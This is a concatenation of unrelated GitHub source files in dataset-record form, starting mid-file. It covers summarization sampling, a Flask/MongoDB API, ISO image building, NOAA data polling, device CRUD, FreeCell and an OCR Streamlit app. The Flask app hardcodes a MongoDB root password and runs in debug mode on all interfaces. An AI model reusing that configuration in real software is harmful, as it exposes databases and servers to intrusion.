oracle_scores = get_priority(source_sents_tok, reference, nlp)\n\n if args.extractor == 'extract':\n priority = extract_priority\n elif args.extractor == 'oracle':\n priority = oracle_priority\n\n inputs = tokenizer(\n [source_annotated],\n 
padding='longest',\n truncation=True,\n max_length=1024,\n return_tensors='pt',\n )\n input_ids = inputs['input_ids'].to(args.gpu_device)\n attention_mask = inputs['attention_mask'].to(args.gpu_device)\n cls_mask = input_ids >= special_id_min\n\n idxs = []\n masks = []\n for exp in range(args.k):\n unmask_idxs = []\n for source_idx in range(len(extract_scores_norm)):\n should_select = np.random.random() <= extract_scores_norm[source_idx]\n if should_select:\n unmask_idxs.append(extract_priority[source_idx])\n idxs.append(unmask_idxs)\n masks.append(sentence_mask(cls_mask, unmask_idxs, attention_mask))\n\n sampled_extracts = [''.join('' + str(source_sents[i]) for i in idx) for idx in idxs]\n all_masks = torch.cat(masks)\n num_cand = len(all_masks)\n input_ids_rep = input_ids.repeat(num_cand, 1)\n kwargs = {\n 'input_ids': input_ids_rep,\n 'attention_mask': all_masks,\n 'num_return_sequences': 1,\n 'num_beams': 4,\n 'length_penalty': 4.0,\n 'max_length': 142,\n 'min_length': 56,\n 'no_repeat_ngram_size': 3,\n 'early_stopping': True,\n }\n\n pred_ids = model.model.generate(**kwargs)\n pred_str = tokenizer.batch_decode(pred_ids.tolist(), skip_special_tokens=True)\n\n rank_example['priority']['prob'] = list(extract_scores_norm)\n rank_example['priority']['source_idxs'] = list(extract_priority)\n rank_example['sampled']['source_idxs'] = idxs\n rank_example['sampled']['abstracts'] = pred_str\n rank_example['sampled']['extracts'] = sampled_extracts\n\n rouges = []\n r1s = []\n for idx, x in enumerate(pred_str):\n rr = compute_rouge([x], [reference], rouge_metric)\n rank_example['sampled']['scores'].append(rr)\n rouges.append(rr)\n r1s.append(rr['rouge1_f1'])\n best_idx = np.argmax(r1s)\n best_input = list(map(str, idxs[best_idx]))\n num_source_sent = len(best_input)\n rouge_df = pd.DataFrame(rouges)\n cols = ['rouge1_f1', 'rouge2_f1', 'rougeL_f1']\n row = {\n 'best_num_source_sents': num_source_sent, 'best_source_sent_idxs': ','.join(best_input),\n 'num_source_sents': num_trunc_sent,\n 'sent_compression': num_trunc_sent / num_source_sent\n }\n for col in cols:\n row[f'{col}_avg'] = rouge_df[col].mean()\n row[f'{col}_max'] = rouge_df[col].max()\n row[f'{col}_min'] = rouge_df[col].min()\n sample_out.append(row)\n rank_dataset.append(rank_example)\n\n sample_out = pd.DataFrame(sample_out)\n for col in list(sample_out.columns):\n try:\n print(col, sample_out[col].dropna().mean())\n except:\n print(col, ' not a valid column to average')\n\n out_fn = os.path.join(results_dir, f'{args.extractor}_sampled.csv')\n print(f'Saving to {out_fn}')\n sample_out.to_csv(out_fn, index=False)\n\n out_fn = os.path.join(results_dir, 'sample_dataset.json')\n print(f'Saving Rank dataset to {out_fn}...')\n with open(out_fn, 'w') as fd:\n ujson.dump(rank_dataset, fd)\n","repo_name":"griff4692/faith-sum","sub_path":"gen_transformers/deprecated/sample_generate.py","file_name":"sample_generate.py","file_ext":"py","file_size_in_byte":10033,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} {"seq_id":"71046966314","text":"import os\nfrom flask import Flask, redirect, url_for, request, render_template, jsonify\nfrom pymongo import MongoClient\nfrom json import loads, dumps\nfrom bson import json_util\n\napp = Flask(__name__)\nclient = MongoClient(\n os.environ['DB_PORT_27017_TCP_ADDR'],\n 27017,username='root',password='rootpassword')\ndb = client[\"dbproyecto1\"]\nmycol= db[\"publicaciones\"]\n\n@app.route('/')\ndef home():\n return \"API SERVIDOR A\"\n\n@app.route('/memoria')\ndef memoria():\n arry = os.popen('cat /proc/memoria_200915609').read()\n memoria = loads(arry)\n return memoria\n@app.route('/cpu')\ndef cpu():\n arry = os.popen('cat /proc/cpu_200915609').read()\n cpu = loads(arry)\n return cpu \n \n\n\n@app.route('/items')\ndef items():\n \n _items = mycol.find()\n items = [item for item in _items]\n lista = dumps(items,default=json_util.default)\n return lista\n \n@app.route('/new', methods=['POST'])\ndef new():\n data = request.get_json()\n #print(data['autor'],flush=True)\n item_doc = {\n \"autor\": data['autor'],\n \"nota\": data['nota']\n } \n x = mycol.insert_one(item_doc)\n return str(x.inserted_id)\n@app.route('/count')\ndef contador():\n _items = mycol.find()\n items_count={\"cantidad \": _items.count()}\n return loads(dumps(items_count))\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0',port=80, debug=True)\n","repo_name":"Gary-Joan/Proyecto1_SOPES1","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} {"seq_id":"10431103764","text":"SPARK_PRESEED_FILE = \"file=/cdrom/preseed/spark.sk\"\nAPPEND = \"auto=true priority=critical net.ifnames=0 =5\"\n#-------------------------------------------------------------------------------\nGRUB_TEMPLATE = \"\"\"###\nif loadfont $prefix/font.pf2 ; then\n\tset gfxmode=800x600\n\tset gfxpayload=keep\n\tinsmod efi_gop\n\tinsmod efi_uga\n\tinsmod video_bochs\n\tinsmod video_cirrus\n\tinsmod gfxterm\n\tinsmod png\n\tterminal_output gfxterm\nfi\n\nif background_image /isolinux/splash.png; then\n\tset color_normal=light-gray/black\n\tset color_highlight=white/black\nelif background_image /splash.png; then\n\tset color_normal=light-gray/black\n\tset color_highlight=white/black\nelse\n\tset menu_color_normal=cyan/blue\n\tset menu_color_highlight=white/blue\nfi\n\n#insmod play\n#play 960 440 1 0 4 440 1\nset theme=/boot/grub/theme/1\n\ninsmod keystatus\nif keystatus --shift; then\n\tset timeout=20\nelse\n\tset timeout=5\nfi\n\nset default=0\nmenuentry --hotkey=a 'Automated install' {{\n\tset background_color=black\n\tlinux /install.amd/vmlinuz {APPEND} {PRESEED_FILE} vga=788 --- quiet\n\tinitrd /install.amd/gtk/initrd.gz\n}}\"\"\"\n\n#-------------------------------------------------------------------------------\nISOLINUX_TEMPLATE = \"\"\"###\npath\ndefault vesamenu.c32\nprompt 0\ntimeout 50\n\nmenu hshift 4\nmenu width 70\nmenu title Debian GNU/Linux installer menu (BIOS mode)\nmenu background splash.png\nmenu color title\t* #FFFFFFFF *\nmenu color border\t* #00000000 #00000000 none\nmenu color sel\t\t* #ffffffff #76a1d0ff *\nmenu color hotsel\t1;7;37;40 #ffffffff #76a1d0ff *\nmenu color tabmsg\t* #ffffffff #00000000 *\nmenu color help\t\t37;40 #ffdddd00 #00000000 none\nmenu vshift 8\nmenu rows 12\n\nlabel autoinstall\n\tmenu default\n\tmenu label ^Automated install\n\tkernel /install.amd/vmlinuz\n\tappend {APPEND} {PRESEED_FILE} vga=788 initrd=/install.amd/gtk/initrd.gz --- quiet \"\"\"\n#-------------------------------------------------------------------------------\n\nUDISKSCTL_MOUNT_CMD = \"udisksctl loop-setup -r -f {0}\"\nUDISKSCTL_UNMOUNT_CMD = \"udisksctl unmount -b {0}p1\"\nUDISKSCTL_INFO_CMD = \"udisksctl info -b {0}p1\"\nOS_XORRISO_CMD = \"\"\"\nxorriso -as mkisofs\\\n -r -checksum_algorithm_iso md5,sha1,sha256,sha512\\\n -V \"{0}\" -o {1}\\\n -J -joliet-long -cache-inodes\\\n -isohybrid-mbr {2} -b isolinux/isolinux.bin -c 
isolinux/boot.cat\\\n -boot-load-size 4 -boot-info-table -no-emul-boot -eltorito-alt-boot -e boot/grub/efi.img -no-emul-boot\\\n -isohybrid-gpt-basdat -isohybrid-apm-hfsplus {3} {4}\n\"\"\"\n# -quiet\n#-------------------------------------------------------------------------------\n#import re\nimport os\nimport subprocess\n\n\nclass IsoImageBuilder:\n\tdef __init__(self):\n\t\tsuper().__init__()\n\t\tself.loop = None\n\t\tself.process = None\n\t\tself.exitcode = None\n\n\tdef get_iso_label(self, source_iso_file):\n\t\tf = open(source_iso_file,'rb')\n\t\tf.seek(0x8028, 0) #from the begin Hexadecimal 0X8028 = 32808\n\t\tiso_label = (f.read(32).decode(\"utf-8\").strip())\n\t\tf.close()\n\t\treturn iso_label\n\n\tdef __execute(self, cmd=None):\n\t\tif cmd != None and self.process == None:\n\t\t\tself.process = subprocess.Popen(['sh', cmd],stdout=subprocess.PIPE, stderr=subprocess.STDOUT)\n\t\t\treturn self.process\n\t\telse:\n\t\t\treturn None\n\n\tdef __os_execute_cmd(self, cmd):\n\t\tos_stream = os.popen(cmd)\n\t\tos_output = os_stream.read()\n\t\treturn os_output\n\n\tdef __iso_mount(self, source_iso_file):\n\t\t\tself.__iso_unmount()\n\t\t\tmount_output_cmd = self.__os_execute_cmd(UDISKSCTL_MOUNT_CMD.format(source_iso_file))\n\t\t\tthislist = mount_output_cmd.split()\n\t\t\tif 'Mapped' in thislist:\n\t\t\t\tself.loop = (thislist[-1].replace('.', ''))\n\t\t\t\tlabel = self.labels_object_dict.get('label_rebuild_label')\n\t\t\t\tlabel.set_text(f'mount {self.loop} Ok')\n\t\t\tself.log.debug('mount', self.loop)\n\n\tdef __get_mount_path(self):\n\t\tif self.loop != None:\n\t\t\tinfo_output_cmd = self.__os_execute_cmd(UDISKSCTL_INFO_CMD.format(self.loop))\n\t\t\tthislist = []\n\t\t\tfor text in info_output_cmd.splitlines():\n\t\t\t\tif 'MountPoints:' in text:\n\t\t\t\t\ttemplist = text.split()\n\t\t\t\t\ttemplist.remove('MountPoints:')\n\t\t\t\t\tthislist += templist\n\t\t\t\t\tbreak\n\t\t\treturn (\" \".join(thislist).replace(\" \", \"\\ \"))\n\n\tdef __iso_unmount(self):\n\t\tif self.loop != None:\n\t\t\tunmount_output_cmd = self.__os_execute_cmd(UDISKSCTL_UNMOUNT_CMD.format(self.loop))\n\t\t\tif 'Unmounted' in unmount_output_cmd.split():\n\t\t\t\tself.log.debug('unmount', self.loop)\n\t\t\t\tlabel = self.labels_object_dict.get('label_rebuild_label')\n\t\t\t\tlabel.set_text(f'unmount {self.loop} Ok')\n\t\t\t\tself.loop = None\n\n\tdef __mbr_dump(self, source_iso_file):\n\t\twith open(source_iso_file, 'rb') as rb, open(f\"{self.settings.WORK_DIR}/isohdpfx.bin\", 'wb') as wb:\n\t\t\tisohdpfx = rb.read(432)\n\t\t\twb.write(isohdpfx)\n\t\t\trb.close()\n\t\t\twb.close()\n\n\tdef __write_boot_config_files(self):\n\t\tnew_append = APPEND\n\t\twith open(self.settings.GRUB_FILE, 'w') as w_grub, open(self.settings.ISOLINUX_FILE , 'w') as w_isolinux:\n\t\t\tw_grub.write(GRUB_TEMPLATE.format(APPEND=new_append, PRESEED_FILE=SPARK_PRESEED_FILE))\n\t\t\tw_isolinux.write(ISOLINUX_TEMPLATE.format(APPEND=new_append, PRESEED_FILE=SPARK_PRESEED_FILE))\n\t\t\tw_grub.close()\n\t\t\tw_isolinux.close()\n\n\tdef __run_xorriso(self, source_iso_file, output_iso_file_name):\n\t\t#mount_point = '/media/$USER/'+iso_label.replace(\" \", \"\\ \")\n\t\tmount_point = self.__get_mount_path()\n\t\tiso_label = self.get_iso_label(source_iso_file)\n\t\tpretty_label = iso_label.strip()\n\t\tcmd = OS_XORRISO_CMD.format(pretty_label, output_iso_file_name, f\"{self.settings.WORK_DIR}/isohdpfx.bin\", mount_point, self.settings.CD_ROOT_DIR)\n\t\tself.log.debug(cmd)\n#\t\tself.__os_execute_cmd(cmd)\n\n\t\twith 
open(f\"{self.settings.WORK_DIR}/xorriso.sh\", 'w') as script:\n\t\t\tscript.write(cmd)\n\t\t\tscript.close()\n\n\t\tcmd = f\"{self.settings.WORK_DIR}/xorriso.sh\"\n\t\tlabel = self.labels_object_dict.get('label_rebuild_label')\n\t\tprogressbar = self.widgets_object_dict.get('progressbar_rebuild_progressbar')\n\n\t\tprocess = self.__execute(cmd)\n\t\tfor line in iter(process.stdout.readline, ''):\n\t\t\tdata = line.decode().split()\n\t\t\tif \"done\" in data or \"done,\" in data:\n\t\t\t\tstdout_text = ' '.join(data[2:6]).strip(',')\n\t\t\t\tstdout_progres = (' '.join(data[4:5]).strip('%'))\n\t\t\t\tprogressbar.set_fraction(float(stdout_progres[:-2])/ 100)\n\t\t\t\tlabel.set_text(stdout_text)\n\t\t\tif process.poll() is not None:\n\t\t\t\trc = process.returncode\n\t\t\t\tif rc == 0:\n\t\t\t\t\tself.exitcode = rc\n\t\t\t\t\tself.process = None\n\t\t\t\t\tprogressbar.set_fraction(1)\n\t\t\t\t\tlabel.set_text('Completeed')\n\t\t\t\telse:\n\t\t\t\t\tself.exitcode = rc\n\t\t\t\tbreak\n\n\tdef __cleen_up_file(self):\n\t\tlabel = self.labels_object_dict.get('label_rebuild_label')\n\t\tlabel.set_text('Cleen up...')\n\t\tcleen_up_file = (\"isohdpfx.bin\", \"xorriso.sh\",)\n\t\tfor f in cleen_up_file:\n\t\t\tif os.path.exists(f\"{self.settings.WORK_DIR}/{f}\"):\n\t\t\t\tos.remove(f\"{self.settings.WORK_DIR}/{f}\")\n\n\tdef make_new_image(self, source_iso_file, output_iso_file_name):\n\t\tself.__write_boot_config_files()\n\t\tself.__mbr_dump(source_iso_file)\n\t\tself.__iso_mount(source_iso_file)\n\t\tos.sync()\n\t\tself.__run_xorriso(source_iso_file, output_iso_file_name)\n\t\tos.sync()\n\t\tself.__iso_unmount()\n\t\tself.__cleen_up_file()\n\n\n\n\n\n","repo_name":"Gharib24/spark","sub_path":"spark/sparkhandlers/iso_image_builder.py","file_name":"iso_image_builder.py","file_ext":"py","file_size_in_byte":6956,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"39980646082","text":"\"\"\"\nPosts updated files of NOAA water level/temperature hydrometric data. Station site IDs provided\nin the poll_noaa_stn_file. Compatible with Python 3.5+.\n\nusage:\nsample url: https://tidesandcurrents.noaa.gov/api/datagetter?range=1&station=9450460&product=water_temperature&units=metric&time_zone=gmt&application=web_services&format=csv\n\nin an sr_poll configuration file::\n\n\tpollUrl http://tidesandcurrents.noaa.gov/api\n retrievePathPattern /datagetter?range=1&station={0:}&product={1:}&units=metric&time_zone=gmt&application=web_services&format=csv\n\n\tpoll_noaa_stn_file [path/to/stn/file]\n\tcallback noaa_hydrometric\n\nsample station file::\n\n 7|70678|9751639|Charlotte Amalie|US|VI|-4.0\n 7|70614|9440083|Vancouver|US|WA|-8.0\n\nThe poll:\nIf poll_noaa_stn_file isn't set, it'll grab an up-to-date version of all station site code data from the \nNOAA website. The station list file is in the following format:\nSourceID | SiteID | SiteCode | SiteName | CountryID | StateID | UTCOffset\nEach station on its own line.\nPosts the file on the exchange if the request returns a valid URL. 
\n\nin v2, one needed a matching downloader plugin, but in sr3 we can leverage the retrievePath feature\nso that the normal downloader works, so only the poll plugin is needed.\n\n\"\"\"\n\nimport copy\nimport datetime\nimport logging\n\nimport os\nimport sarracenia\nfrom sarracenia.flowcb import FlowCB\nimport urllib.request\nimport xml.etree.ElementTree as ET\n\nlogger = logging.getLogger(__name__)\n\n\nclass Noaa_hydrometric(FlowCB):\n def __init__(self, options):\n\n super().__init__(options,logger)\n\n # these options are only for the poll.\n self.o.add_option(option='poll_noaa_stn_file', kind='str')\n self.o.add_option( option='retrievePathPattern', kind='str', \\\n default_value='datagetter?range=1&station={0:}&product={1:}&units=metric&time_zone=gmt&application=web_services&format=csv' )\n\n if self.o.identity_method.startswith('cod,'):\n m, v = self.o.identity_method.split(',')\n self.identity = {'method': m, 'value': v}\n\n def poll(self) -> list:\n\n # Make list of site codes to pass to http get request\n sitecodes = []\n if hasattr(self.o, 'poll_noaa_stn_file'):\n stn_file = self.o.poll_noaa_stn_file\n\n # Parse file to make list of all site codes\n try:\n with open(stn_file) as f:\n for line in f:\n items = line.split('|')\n sitecodes.append(items[2])\n logger.info(\"poll_noaa used stn_file %s\" % stn_file)\n\n except IOError as e:\n logger.error(\"poll_noaa couldn't open stn file: %s\" % stn_file)\n\n else:\n # Grab station site codes from https://opendap.co-ops.nos.noaa.gov/stations/stationsXML.jsp\n tree = ET.parse(urllib.request.urlopen\\\n ('https://opendap.co-ops.nos.noaa.gov/stations/stationsXML.jsp'))\n root = tree.getroot()\n for child in root:\n sitecodes.append(child.attrib['ID'])\n\n incoming_message_list = []\n # Every hour, form the link of water level/temp data to post\n for site in sitecodes:\n\n retrievePath = self.o.retrievePathPattern.format(site, 'water_temperature')\n url = self.o.pollUrl + retrievePath\n logger.info(f'polling {site}: {url}')\n # Water temp request\n resp = urllib.request.urlopen(url).getcode()\n logger.info(f\"poll_noaa file posted: {url}\")\n mtime = datetime.datetime.utcnow().strftime('%Y%m%d_%H%M')\n\n fname = f'noaa_{mtime}_{site}_WT.csv'\n m = sarracenia.Message.fromFileInfo(fname, self.o)\n m['identity'] = self.identity\n m['retrievePath'] = retrievePath\n m['new_file'] = fname\n\n incoming_message_list.append(m)\n\n # Water level request\n retrievePath = self.o.retrievePathPattern.format(\n site, 'water_level') + '&datum=STND'\n url = self.o.pollUrl + retrievePath\n resp = urllib.request.urlopen(url).getcode()\n logger.info(f\"poll_noaa file posted: {url}\")\n\n fname = f'noaa_{mtime}_{site}_WL.csv'\n m = sarracenia.Message.fromFileInfo(fname, self.o)\n m['identity'] = self.identity\n m['retrievePath'] = retrievePath\n m['new_file'] = fname\n\n incoming_message_list.append(m)\n\n return incoming_message_list\n","repo_name":"MetPX/sarracenia","sub_path":"sarracenia/flowcb/poll/noaa_hydrometric.py","file_name":"noaa_hydrometric.py","file_ext":"py","file_size_in_byte":4550,"program_lang":"python","lang":"en","doc_type":"code","stars":42,"dataset":"github-code","pt":"72"} {"seq_id":"9968628030","text":"import traceback\nfrom datetime import datetime\nfrom flask_jwt_extended import current_user\n\nfrom model.db_base import db\nfrom model.model_import import Device, Company, User\n\nfrom util.logger import logger\n\n\ndef read_device(**kwargs):\n logger.info('Get device list')\n logger.info(f'Filter: {kwargs}')\n try:\n condition = 
{k: v for k, v in kwargs.items() if v is not None}\n query = db.session.query(Device).filter_by(**condition).all()\n return query\n except Exception as e:\n logger.error(e)\n logger.debug(traceback.format_exc())\n raise e\n\n\ndef create_device(**kwargs):\n logger.info('Register new device')\n now = datetime.utcnow()\n try:\n query = Device.query.filter_by(serial=kwargs.get('serial')).first()\n if query is not None:\n logger.error(\"Device already exists\")\n return {'message': 'Device already exists'}, 409\n\n company = db.session.query(Company).filter_by(name=kwargs.get('company')).one()\n owner = db.session.query(User).filter_by(userid=kwargs.get('owner')).one()\n device = Device(\n model=kwargs.get('model'),\n serial=kwargs.get('serial'),\n company=company,\n owner=owner,\n ip=kwargs.get('ip'),\n created=now,\n created_by=kwargs.get('created_by', current_user),\n last_edited=now,\n edited_by=kwargs.get('edited_by', current_user),\n is_deleted=False\n )\n db.session.add(device)\n db.session.commit()\n return {'message': f'Posted device<{kwargs.get(\"serial\")}> to db.'}, 201\n except Exception as e:\n logger.error(e)\n logger.debug(traceback.format_exc())\n raise e\n\n\ndef update_device(**kwargs):\n logger.info('Update existing device')\n now = datetime.utcnow()\n try:\n query = db.session.query(Device).filter_by(serial=kwargs.get('serial')).one()\n if kwargs.get('newserial'):\n query.serial = kwargs.get('newserial')\n if kwargs.get('model'):\n query.model = kwargs.get('model')\n if kwargs.get('company'):\n query.company = db.session.query(Company).filter_by(name=kwargs.get('company')).one()\n if kwargs.get('ip'):\n query.ip = kwargs.get('ip')\n if kwargs.get('owner'):\n query.owner = db.session.query(User).filter_by(userid=kwargs.get('owner')).one()\n query.edited = now\n query.edited_by = current_user\n db.session.commit()\n return {'message': f'Updated device<{query.serial}> from db.'}, 200\n except Exception as e:\n logger.error(e)\n logger.debug(traceback.format_exc())\n raise e\n\n\ndef delete_device(**kwargs):\n logger.info('Delete existing device')\n try:\n query = db.session.query(Device).filter_by(**kwargs).one()\n db.session.delete(query)\n db.session.commit()\n return {'message': f'Deleted device<{query.serial}> from db.'}, 200\n except Exception as e:\n logger.error(e)\n logger.debug(traceback.format_exc())\n raise e\n","repo_name":"illo-Co-Ltd/cms","sub_path":"flask/service/data/device_service.py","file_name":"device_service.py","file_ext":"py","file_size_in_byte":3114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41006208575","text":"import random\nimport numpy as np\nfrom constants import *\n\n\ndef get_random_indexes_from_array(array, number_of_indexes_to_pick):\n already_picked_indexes = np.full(number_of_indexes_to_pick, -1)\n random_indexes = np.full(number_of_indexes_to_pick, -1)\n iterator = 0\n while iterator < number_of_indexes_to_pick:\n picked_index = int(random.randrange(0, len(array)))\n if picked_index not in already_picked_indexes:\n random_indexes[iterator] = picked_index\n already_picked_indexes[iterator] = picked_index\n iterator += 1\n return random_indexes\n\n\ndef get_values_array(value_to_sketch):\n return {\n 'crossover_rate': CROSSOVER_RATES,\n 'mutation_rate': MUTATION_RATES,\n 'tournament_size': TOURNAMENT_SIZES,\n 'population_size': POPULATION_SIZES\n 
}[value_to_sketch]\n","repo_name":"patrykszwed/itai","sub_path":"KnapsackProblem/helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"73470471594","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*\n\n\"\"\"\nDescribe a freecell game\n\"\"\"\n\nRED = [\"H\", \"D\"]\nBLACK = [\"S\", \"C\"]\nSUITS = RED + BLACK\nCARD_VALUE = [\"a\", 2, 3, 4, 5, 6, 7, 8, 9, 10, \"j\", \"q\", \"k\"]\nFREECELL = 4\nCOLUMN = 8\nCOL_BASE = \"B\"\nCOL_FC = \"FC\"\n\nclass Card(object):\n def __init__(self, suit, num):\n if num < 1 or num > len(CARD_VALUE):\n raise ValueError(\"Incorrect card number\")\n if suit not in SUITS:\n raise ValueError(\"Incorrect suit\")\n \n self.num = num\n self.suit = suit\n self.name = \"%s%s\" % (str(CARD_VALUE[num-1]), suit)\n\n self.is_red = suit in RED\n self.uid = (num << 2) + SUITS.index(suit)\n \n def __eq__(self, other):\n if isinstance(other, Card):\n return self.uid == other.uid\n return False\n\n def __hash__(self):\n return self.uid\n\nDECK = [Card(j, i) for i in range(1, len(CARD_VALUE)+1) for j in SUITS]\n\nclass FCBoard(object):\n def __init__(self, freecells, bases, columns):\n self.freecells = freecells # list[4]\n self.bases = bases # dict {suit: [cards]}\n self.columns = columns # list[8][cards]\n \n def clone(self):\n f = list(self.freecells)\n b = dict((k, list(self.bases.get(k))) for k in SUITS)\n c = [list(self.columns[i]) for i in range(COLUMN)]\n return FCBoard(f, b, c)\n \n def is_won(self):\n return sum([len(self.bases.get(k)) for k in SUITS]) == 52\n\n def apply(self, choice):\n c0 = choice.cards[0]\n\n # From origin\n if choice.col_orig == COL_FC:\n self.freecells.remove(c0)\n elif choice.col_orig == COL_BASE:\n self.bases.get(c0.suit).remove(c0)\n else:\n for _ in choice.cards:\n self.columns[choice.col_orig].pop()\n \n # To dest\n if choice.col_dest == COL_BASE:\n self.bases.get(c0.suit).append(c0)\n elif choice.col_dest == COL_FC:\n self.freecells.append(c0)\n else:\n self.columns[choice.col_dest].extend(choice.cards)\n \n @classmethod\n def init_from_deck(cls, deck):\n columns = [[] for _ in range(0, COLUMN)]\n i = 0\n for c in deck:\n columns[i].append(c)\n i = i+1 if i < COLUMN-1 else 0\n \n return cls([], dict((k, []) for k in SUITS), columns)\n \n def compute_hash(self):\n fc_bits = 0\n for c in self.freecells:\n fc_bits += 1 << c.uid\n \n cols = []\n for i in range(COLUMN):\n col_bits = 0\n j = 0\n for c in self.columns[i]:\n col_bits += c.uid << (j*6)\n j += 1\n cols.append(col_bits)\n cols.sort()\n\n return (fc_bits, *cols)\n \n \nclass Choice(object):\n def __init__(self, cards, col_orig, col_dest):\n self.cards = cards\n self.col_orig = col_orig\n self.col_dest = col_dest\n\n self.weight = 0\n \n def get_reverse(self):\n return Choice(self.cards, self.col_dest, self.col_orig)\n \n def compute_hash(self, fcboard):\n cards_bit = 0\n for c in self.cards:\n cards_bit += 1 << c.uid\n \n orig_bit = 0\n if self.col_orig == COL_FC:\n orig_bit = 2\n else:\n i = 0\n for c in fcboard.columns[self.col_orig][:-len(self.cards)]:\n orig_bit += c.uid << (i*6)\n i += 1\n \n dest_bit = 0\n if self.col_dest == COL_BASE:\n dest_bit = 1\n elif self.col_dest == COL_FC:\n dest_bit = 2\n else:\n i = 0\n for c in fcboard.columns[self.col_dest]:\n dest_bit += c.uid << (i*6)\n i += 1\n \n if dest_bit > orig_bit:\n return (cards_bit, dest_bit, orig_bit)\n else:\n return (cards_bit, orig_bit, dest_bit)\n \n def equals(self, other):\n 
return other.cards == self.cards and other.col_orig == self.col_orig and other.col_dest == self.col_dest\n\n\nclass FCGame(object):\n def __init__(self, fcboard):\n self.fcboard = fcboard\n\n # pre-compute columns serie, to not compute them every time!\n self._column_series = [self._get_column_series(i) for i in range(COLUMN)]\n self._last_max_mvt = 0\n \n def _get_column_series(self, col_id):\n col = self.fcboard.columns[col_id]\n serie = []\n last_card = None\n for card in reversed(col):\n # End serie if last card doesn't match\n if last_card is not None:\n if last_card.is_red == card.is_red or card.num - last_card.num != 1:\n break\n serie.append(card)\n last_card = card\n serie.reverse()\n return serie\n \n def _update_column_series(self, col_id):\n if col_id != COL_FC and col_id != COL_BASE:\n self._column_series[col_id] = self._get_column_series(col_id)\n \n def _compute_mvt_max(self):\n freecol = sum([len(col) == 0 for col in self.fcboard.columns])\n max_mvt = (1 + FREECELL - len(self.fcboard.freecells)) * (1 + freecol)\n max_mvt_empty = (1 + FREECELL - len(self.fcboard.freecells)) * freecol\n self._last_max_mvt = max_mvt\n return max_mvt, max_mvt_empty\n\n def list_choices(self):\n \"\"\" Compute choice from destination (except for bases) \"\"\"\n choices = []\n # compute size of mvt allowed:\n max_mvt, max_mvt_empty = self._compute_mvt_max()\n\n # Bases from freecell\n for c in self.fcboard.freecells:\n if c.num == len(self.fcboard.bases[c.suit]) + 1:\n choices.append(Choice([c], COL_FC, COL_BASE))\n \n # Columns\n for cid in range(COLUMN):\n col = self._column_series[cid]\n if len(col) > 0:\n last_card = col[-1]\n\n # to Base\n if last_card.num == len(self.fcboard.bases[last_card.suit]) + 1:\n choices.append(Choice([last_card], cid, COL_BASE))\n\n # Search specific cards\n if last_card.num > 1:\n wanted_is_red = not last_card.is_red\n wanted_num = last_card.num-1\n \n # from freecell\n for c in self.fcboard.freecells:\n if c.num == wanted_num and c.is_red == wanted_is_red:\n choices.append(Choice([c], COL_FC, cid))\n \n # from other col\n for cid2 in range(COLUMN):\n if cid == cid2:\n continue\n col2 = self._column_series[cid2]\n idx = 0\n for c in col2:\n if c.num == wanted_num and c.is_red == wanted_is_red:\n if (len(col2) - idx) <= max_mvt:\n choices.append(Choice(col2[idx:], cid2, cid))\n break\n idx += 1\n \n # to Freecell\n if len(self.fcboard.freecells) < FREECELL:\n choices.append(Choice([last_card], cid, COL_FC))\n else:\n # from Freecell\n for c in self.fcboard.freecells:\n choices.append(Choice([c], COL_FC, cid))\n\n # from other columns\n for cid2 in range(COLUMN):\n if cid == cid2:\n continue\n col2 = self._column_series[cid2]\n for j in range(max(0, len(col2)-max_mvt_empty), len(col2)):\n choices.append(Choice(col2[j:], cid2, cid))\n \n return choices\n\n def apply(self, choice):\n self.fcboard.apply(choice)\n self._update_column_series(choice.col_orig)\n self._update_column_series(choice.col_dest)\n","repo_name":"fp2103/fcsolver","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":8063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12470260962","text":"\n### Imports\nfrom enum import Enum\nfrom io import BytesIO, StringIO\nfrom typing import Union\nimport os, sys, json\nimport pandas as pd\nimport streamlit as st\nfrom PIL import Image\n\n# for heroku (also going to add to oer_demo.py)\n# pytesseract.pytesseract.tesseract_cmd = '/app/.apt/usr/bin/tesseract'\n\n# .py 
files\nsys.path.append(os.path.join('./data/images/'))\nsys.path.append(os.path.join('./src/'))\nimport parse\nimport binarize_images\nimport img_to_text\n\nSTYLE = \"\"\"\n\n\"\"\"\n\nFILE_TYPES = [\"png\", \"jpg\", \"tiff\"]\n\n\nclass FileType(Enum):\n \"\"\"Used to distinguish between file types\"\"\"\n\n IMAGE = \"Image\"\n CSV = \"csv\"\n PYTHON = \"Python\"\n\n\ndef get_file_type(file: Union[BytesIO, StringIO]) -> FileType:\n \"\"\"The file uploader widget does not provide information on the type of file uploaded so we have\n to guess using rules or ML\n\n I've implemented rules for now :-)\n\n Arguments:\n file {Union[BytesIO, StringIO]} -- The file uploaded\n\n Returns:\n FileType -- A best guess of the file type\n \"\"\"\n\n if isinstance(file, BytesIO):\n return FileType.IMAGE\n content = file.getvalue()\n if (\n content.startswith('\"\"\"')\n or \"import\" in content\n or \"from \" in content\n or \"def \" in content\n or \"class \" in content\n or \"print(\" in content\n ):\n return FileType.PYTHON\n\n return FileType.CSV\n\n\ndef main():\n st.write(os.getcwd())\n st.write('# OER image to text')\n # st.info(__doc__)\n st.markdown(STYLE, unsafe_allow_html=True)\n\n last_name_input = st.text_input(\"Enter your last name\")\n if not last_name_input:\n st.warning('Please type last name and hit enter')\n\n threshold_input = st.number_input(\"Enter threshold for binarizing images [0, 255]\", min_value=0, max_value=255, value=150)\n\n\n page1 = st.file_uploader(\"Upload OER page 1\", type=FILE_TYPES)\n page2 = st.file_uploader(\"Upload OER page 2\", type=FILE_TYPES)\n show_page1 = st.empty()\n show_page2 = st.empty()\n\n\n if not page1:\n show_page1.info(\"Please upload OER page 1 of type: \" + \", \".join(FILE_TYPES))\n return\n if not page2:\n show_page2.info(\"Please upload OER page 2 of type: \" + \", 